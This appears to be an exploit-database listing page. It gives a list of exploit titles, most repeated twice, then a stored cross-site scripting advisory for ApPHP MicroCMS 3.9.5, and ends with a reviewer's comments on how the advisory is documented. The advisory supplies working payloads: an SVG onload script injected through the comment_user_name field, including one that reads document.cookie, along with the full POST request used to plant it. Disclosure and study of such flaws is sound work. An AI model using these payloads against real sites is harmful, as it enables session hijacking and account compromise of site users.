
11 new exploits

IBM AIX 5.2/5.3 FTP Client - Local Buffer Overflow
Yahoo! Widgets Engine 4.0.3 - YDPCTL.dll ActiveX Control Buffer Overflow
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)
Simple PHP Blog 0.8.4 - (Add Admin) Cross-Site Request Forgery
miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
miniblog 1.0.1 - (Add New Post) Cross-Site Request Forgery
PHP Press Release - Cross-Site Request Forgery (Add Admin)
PHP Press Release - (Add Admin) Cross-Site Request Forgery
Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)
Spacemarc News - Cross-Site Request Forgery (Add New Post)
Minecraft Launcher - Insecure File Permissions Privilege Escalation
Maian Weblog 4.0 - (Add New Post) Cross-Site Request Forgery
Spacemarc News - (Add New Post) Cross-Site Request Forgery
Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation
sheed AntiVirus - Unquoted Service Path Privilege Escalation
AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities
sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation
AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities
Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit)
Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)
ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
ApPHP MicroBlog 1.0.2 - (Add New Author) Cross-Site Request Forgery
Subversion 1.6.6 / 1.6.12 - Code Execution
Cisco Webex Player T29.10 - '.WRF' Use-After-Free Memory Corruption
Cisco Webex Player T29.10 - '.ARF' Out-of-Bounds Memory Corruption
Adobe Flash Player 23.0.0.162 - '.SWF' ConstantPool Critical Memory Corruption
Categorizator 0.3.1 - SQL Injection
NetBilletterie 2.8 - Multiple Vulnerabilities
ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting
OpenCimetiere v3.0.0-a5 - Blind SQL Injection
Android - Binder Generic ASLR Leak
ApPHP MicroCMS 3.9.5 - (Add Admin) Cross-Site Request Forgery
# Exploit Title :----------------- : ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting
# Author :------------------------ : Besim
# Google Dork :---------------- : -
# Date :-------------------------- : 12/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- : PHP
# Vendor Homepage :------- : http://www.apphp.com
# Software link : -------------- : https://www.apphp.com/customer/index.php?page=free-products
-*-*-*-*-*-*-*-*- Description -*-*-*-*-*-*-*-*-
*-* Vulnerable link : http://site_name/path/index.php?page=pages&pid=
*-* Stored XSS Payload ( Comments ):
# Vulnerable URL : http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name
# Payload : <svg/onload=prompt(7);//>
############ POST DATA ############
task=publish_comment &
comment_id=
& article_id=13
&user_id=
&token=212529c97855409e56c0e333721461df
&comment_user_name=<svg/onload=prompt(document.cookie);//>
&comment_user_email=meryem@yopmai.com
&comment_text=skdLSJDLKSDKJ
&captcha_code=w7AG
&btnSubmitPC=Publish your comment
############ ########## ############
*-* Thanks Meryem AKDOĞAN *-*
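Review bot: the Description lists "Vulnerable link : http://site_name/path/index.php?page=pages&pid=" but never names a parameter or payload for it; the only documented injection point is comment_user_name on page=posts&post_id=. Either describe what is affected on the pages&pid= route or drop that line. Two further documentation points: the Date "12/10/2016" can be read as either day-first or month-first, so an unambiguous format would help, and the write-up does not say where the stored comment_user_name is rendered without HTML encoding, which is the detail a maintainer needs to place the output-encoding fix. The token and captcha_code values in the POST data are tied to one session and should be marked as sample values.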